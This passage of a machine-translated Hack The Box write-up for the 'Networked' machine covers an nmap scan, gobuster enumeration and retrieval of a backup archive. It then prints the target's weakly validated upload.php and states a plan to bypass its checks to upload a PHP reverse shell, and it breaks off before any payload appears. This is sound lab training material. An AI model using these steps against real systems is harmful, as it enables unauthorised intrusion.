{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-networked-en","result":{"data":{"markdownRemark":{"id":"0cf9d9ff-7583-538b-9150-a635f18b058d","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-networked\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/c0133de27cc96db7d5bc25f09474c58c/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABX0lEQVQY0x2PvU7bUACF/Rbdu7QLFcQNEF/7xo7tEDshCTHEkDQBExGBFEEFDYLQpvxtTDAgJsSIxMrCI/BS9+ulw9HRkY6OvmOcT444He+rv5MD2uspcSullqQ00y5Jp08n26HaamMHFbxomYVioL2uc4QTxloReaeEKVylhfHy9Ee9Pt/w/vbIxfSQbG+fn8cnDEcHjA7HnE4v6A2GeHGDpNsnXlmjtdGjP9gh7WV0t4csuuHHIN9tXxnTyzq3dxP1cH/F9fQX9fYW3WwXd6lBMazT2dpFlmLyzR+YYYs5v4ETlDjatLHdImEgmS14mJajZhdNjEb6WQ1GEb/PNhlkq/iJpLYRUF4tUlkX1DoeflNilV2CRI9EmkSUEK6nr3osSFfT+cxZJkH7kzJmcl904auS7rwuOIglgahYiLKNjAVObGFXbAq+g6wK7ZKc5ZETmuq/Pq7qXHDUt7zJP2tHwNCc7pQPAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/c0133de27cc96db7d5bc25f09474c58c/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/c0133de27cc96db7d5bc25f09474c58c/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/c0133de27cc96db7d5bc25f09474c58c/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup for the retired HackTheBox machine “Networked.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li>\n<p><a href=\"#analyzing-the-php-files\">Analyzing the PHP Files</a></p>\n<ul>\n<li><a href=\"#embedding-a-php-script-in-an-image-file-using-exiftool\">Embedding a PHP Script in an Image File Using exiftool</a></li>\n<li><a href=\"#obtaining-user-privileges\">Obtaining User Privileges</a></li>\n<li><a href=\"#getting-a-user-level-shell\">Getting a User-Level Shell</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I start with a port scan.</p>\n<p>Port 80 is open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n\nPORT    STATE  SERVICE VERSION\n<span class=\"token number\">22</span>/tcp  <span class=\"token function\">open</span>   <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7.4</span> <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">22</span>:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> <span class=\"token number\">73</span>:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp  <span class=\"token function\">open</span>   http    Apache httpd <span class=\"token number\">2.4</span>.6 <span class=\"token punctuation\">((</span>CentOS<span class=\"token punctuation\">)</span> PHP/5.4.16<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">charset</span><span class=\"token operator\">=</span>UTF-8<span class=\"token punctuation\">)</span>.\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.6 <span class=\"token punctuation\">(</span>CentOS<span class=\"token punctuation\">)</span> PHP/5.4.16\n<span class=\"token number\">443</span>/tcp closed https</code></pre></div>\n<p>Next, I open the machine’s address in a browser.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 569px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b545468c9dfe85a84b109068bb26a1d1/854dc/image-20220526001201381.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/0lEQVQoz61Qa2uEMBDM//9n/VK1F+PF+EKEq/U08dTYKjqNaSl3h7RQbmCyD3ZnhxDvQBEER1DqIzhy8FCgLN8MS5xOrziwAE+OC9cP4JrcY1/RoQzPZse5I1GtwjiOaNsWfd9jWRYMw2Cp9WiixsX0B63RSIlzXaNuGvSmnuYZH9N0Q1J/D0ilrKgyrKoKW78612gaaeuu6/BuDnddbw5pzEZsXVdr4JokjmP4PoWIIoiQIzKRUgrGGPI8RxiG8LwXbHNSKiuyYXu3/J6kKAqkaYY0icE5t4tJkpheijTLbC6EsP+slLpZ3gPBP/Djcs/hXvMvXos+xOFveLjgJwrStSSsTuWYAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b545468c9dfe85a84b109068bb26a1d1/8ac56/image-20220526001201381.webp 240w,\n/static/b545468c9dfe85a84b109068bb26a1d1/d3be9/image-20220526001201381.webp 480w,\n/static/b545468c9dfe85a84b109068bb26a1d1/0fe84/image-20220526001201381.webp 569w\"\n              sizes=\"(max-width: 569px) 100vw, 569px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b545468c9dfe85a84b109068bb26a1d1/8ff5a/image-20220526001201381.png 240w,\n/static/b545468c9dfe85a84b109068bb26a1d1/e85cb/image-20220526001201381.png 480w,\n/static/b545468c9dfe85a84b109068bb26a1d1/854dc/image-20220526001201381.png 569w\"\n            sizes=\"(max-width: 569px) 100vw, 569px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b545468c9dfe85a84b109068bb26a1d1/854dc/image-20220526001201381.png\"\n            alt=\"image-20220526001201381\"\n            title=\"image-20220526001201381\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I ran an automatic scan with OWASP ZAP but nothing of note came up.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/07793adf052e7eb72b59ad1e5bdd2293/ee515/image-20220526002306955.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 76.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACYklEQVQ4y3VSTW/aQBT0/z+U0tA0CTRpVDVSjz311N57bwWhCQYbsMHfX6wNNtM3S4xIlK40Wu/6vXkz761x1rtAt9tD9905Op0zvO2+1+c3nR463XPc3N4JvuD28x36g2tcXQ5wcTFA7/xS9j76/RtcXV3Lfo2Pn77CcPwIZVODq9k3aFfd7BFmBfy0QrrZIFMZCpWjKBKU2xL5pkBTVzhdaruDMXycYfxowluvkabpM2RZhqqqsNvtMDWnGI1GGN3fYzgcYjKZYDz+izAMUdc7rIIYH779ghHIBRNfIs9zuKsVHMfR5Dzzvi3G8+l9URRQqoTRNA3+t5Ik0cFlWWK73Wq1/Cb43Z6VUtpFU9cwGMi13++fgYUYRBW6uiRmomYj/eT/01UKB2PI9SohnghZeS29PbQglT6vdBuiKDoq5k4wjwKMuq5ftUte/mPDuXbbSlTkukhr+dS6fhm0nGcpSrlQYqVSG21NyV6IPTa82CiksitRcShwANW8BAsY9syEPZ9jQdiWniptuesAc9fDjz8evv/28fM+husFCHxPPxXP8+D7/mEPfIRRqIdouH4C01piviTRGo7rwvMlMQhlIJm2mUpgEscylELDEyJf/kdRjNXaQxQn0mtP5xipNNw0J7AsC3NRaYvK2WymK1PteDzGw8PD8TGTnHFELEVcEcChWNbsYDlOUpgSaNv2E6GtQTstIQsw0XFcbWu5XOr/kRAyhkOhIA5MCBNNSLLFYnEkZgJJSMh7DqidJEn4lNjLlnA6nT4pFP+0wgoECV9a5n0QBMdpsiDfItESMoeE/wARGWRMXDrE0gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/07793adf052e7eb72b59ad1e5bdd2293/8ac56/image-20220526002306955.webp 240w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/d3be9/image-20220526002306955.webp 480w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/e46b2/image-20220526002306955.webp 960w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/a5e36/image-20220526002306955.webp 1269w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/07793adf052e7eb72b59ad1e5bdd2293/8ff5a/image-20220526002306955.png 240w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/e85cb/image-20220526002306955.png 480w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/d9199/image-20220526002306955.png 960w,\n/static/07793adf052e7eb72b59ad1e5bdd2293/ee515/image-20220526002306955.png 1269w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/07793adf052e7eb72b59ad1e5bdd2293/d9199/image-20220526002306955.png\"\n            alt=\"image-20220526002306955\"\n            title=\"image-20220526002306955\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I use <code class=\"language-text\">gobuster</code> for directory enumeration.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ gobuster <span class=\"token function\">dir</span> -u http://<span class=\"token variable\">$RHOST</span>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t <span class=\"token number\">40</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> gobuster1.txt\n\n/uploads              <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">238</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/uploads/<span class=\"token punctuation\">]</span>\n/backup               <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">237</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token operator\">></span> http://<span class=\"token variable\">$RHOST</span>/backup/<span class=\"token punctuation\">]</span> </code></pre></div>\n<p>A path called <code class=\"language-text\">backup</code> is found, and from here I can retrieve the PHP scripts running on the server.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 579px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/81301ad0611046782a3110dab0f2529e/c08bc/image-20220526002810194.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 51.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABn0lEQVQoz31SDU/CQAzd//8xJmpiNFEMggoiyjZg4AdKjDjUbbcvttvu9uydYgTRS17aNNf29bXG1u4eGq0LNBXaHTTO2zghqNilacMcOLD7AwyHDhxnhD75t3f3mM/neHlx8Tid4qzTRadnoWv3YfSsPt59DzPXhUufoiRBwBjc11f4ZBUSimVZhjiOEQQBwjBE/BUTQiDjXCMvOIwBdS7LUidxCi4WC+R5rj9nZDkvkKYqxsmmuqiySZLqeEG5VVVBSqlh1Ot1HOzvo1ar4fr6Cq02jds4QbPZwPbODobOEJ+vwuZX6YJLGOPxDbHIqbPqmGm2WcZ1d99nNGJCnUHxSluacKWAws9n3E8etBMwCdOSELIijQQtocRVV8A0S0wmHJbF0esVaF9wsFB+clsrrBlato3Z0zMWEenCYjCPGAn5e7BKaSQ0lqzW2WmGR8eHaJ06GNk57kYxIj9HQKP6nkcjB2C0ZY98JcFqg82aEkMLUVTg7V0gjISS+Ps8GAv1iSg/pe2rEym/tvonw6WGJDtB6qSNu/xxGv8V/AD+qfnISEcXVQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/81301ad0611046782a3110dab0f2529e/8ac56/image-20220526002810194.webp 240w,\n/static/81301ad0611046782a3110dab0f2529e/d3be9/image-20220526002810194.webp 480w,\n/static/81301ad0611046782a3110dab0f2529e/0c108/image-20220526002810194.webp 579w\"\n              sizes=\"(max-width: 579px) 100vw, 579px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/81301ad0611046782a3110dab0f2529e/8ff5a/image-20220526002810194.png 240w,\n/static/81301ad0611046782a3110dab0f2529e/e85cb/image-20220526002810194.png 480w,\n/static/81301ad0611046782a3110dab0f2529e/c08bc/image-20220526002810194.png 579w\"\n            sizes=\"(max-width: 579px) 100vw, 579px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/81301ad0611046782a3110dab0f2529e/c08bc/image-20220526002810194.png\"\n            alt=\"image-20220526002810194\"\n            title=\"image-20220526002810194\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">tar</span> -xvf backup.tar \nindex.php\nlib.php\nphotos.php\nupload.php</code></pre></div>\n<h2 id=\"analyzing-the-php-files\" style=\"position:relative;\"><a href=\"#analyzing-the-php-files\" aria-label=\"analyzing the php files permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Analyzing the PHP Files</h2>\n<p>Among the downloaded files, I look at <code class=\"language-text\">upload.php</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"># upload.php\n<span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n<span class=\"token keyword\">require</span> <span class=\"token string single-quoted-string\">'/var/www/html/lib.php'</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token function\">define</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"UPLOAD_DIR\"</span><span class=\"token punctuation\">,</span> <span class=\"token string double-quoted-string\">\"/var/www/html/uploads/\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span> <span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'submit'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token keyword\">empty</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"myFile\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$myFile</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"myFile\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token function\">check_file_type</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"myFile\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">filesize</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'myFile'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'tmp_name'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">60000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">echo</span> <span class=\"token string single-quoted-string\">'&lt;pre>Invalid image file.&lt;/pre>'</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"error\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">!==</span> <span class=\"token constant\">UPLOAD_ERR_OK</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>An error occurred.&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token comment\">//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile[\"name\"];</span>\n    <span class=\"token keyword\">list</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$foo</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> <span class=\"token function\">getnameUpload</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$validext</span> <span class=\"token operator\">=</span> <span class=\"token keyword\">array</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'.png'</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'.gif'</span><span class=\"token punctuation\">,</span> <span class=\"token string single-quoted-string\">'.jpeg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$valid</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">false</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">foreach</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$validext</span> <span class=\"token keyword\">as</span> <span class=\"token variable\">$vext</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">substr_compare</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$vext</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">-</span><span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$vext</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">===</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$valid</span> <span class=\"token operator\">=</span> <span class=\"token constant boolean\">true</span><span class=\"token punctuation\">;</span>\n      <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$valid</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>Invalid image file&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token punctuation\">,</span><span class=\"token string single-quoted-string\">'_'</span><span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'REMOTE_ADDR'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token operator\">.</span><span class=\"token string single-quoted-string\">'.'</span><span class=\"token operator\">.</span><span class=\"token variable\">$ext</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token variable\">$success</span> <span class=\"token operator\">=</span> <span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$myFile</span><span class=\"token punctuation\">[</span><span class=\"token string double-quoted-string\">\"tmp_name\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token variable\">$success</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>Unable to save file.&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;p>file uploaded, refresh gallery&lt;/p>\"</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// set proper permissions on the new file</span>\n    <span class=\"token function\">chmod</span><span class=\"token punctuation\">(</span><span class=\"token constant\">UPLOAD_DIR</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$name</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0644</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">displayform</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>This appears to be an application that allows image file uploads.</p>\n<p>Ultimately, I want to upload a PHP file that can give me a reverse shell, but I need to bypass the following conditions:</p>\n<ul>\n<li><code class=\"language-text\">isset($_POST['submit'])</code></li>\n<li><code 